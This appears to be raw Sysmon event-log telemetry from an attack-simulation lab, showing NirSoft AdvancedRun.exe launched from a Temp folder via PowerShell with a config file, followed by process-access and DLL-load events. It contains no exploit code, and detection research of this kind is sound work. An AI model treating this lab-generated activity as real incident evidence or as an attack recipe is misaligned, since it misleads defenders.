18:44:38.723{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004011370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.724{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004011242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:36.645{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000004011234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011231Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:35.145{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.930{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.914{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.914{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.914{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.914{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.914{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.914{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004011112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.805{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.805{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004011106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-DAE7-61EA-1700-000000002702}13003348C:\Windows\System32\svchost.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004011105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004011104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 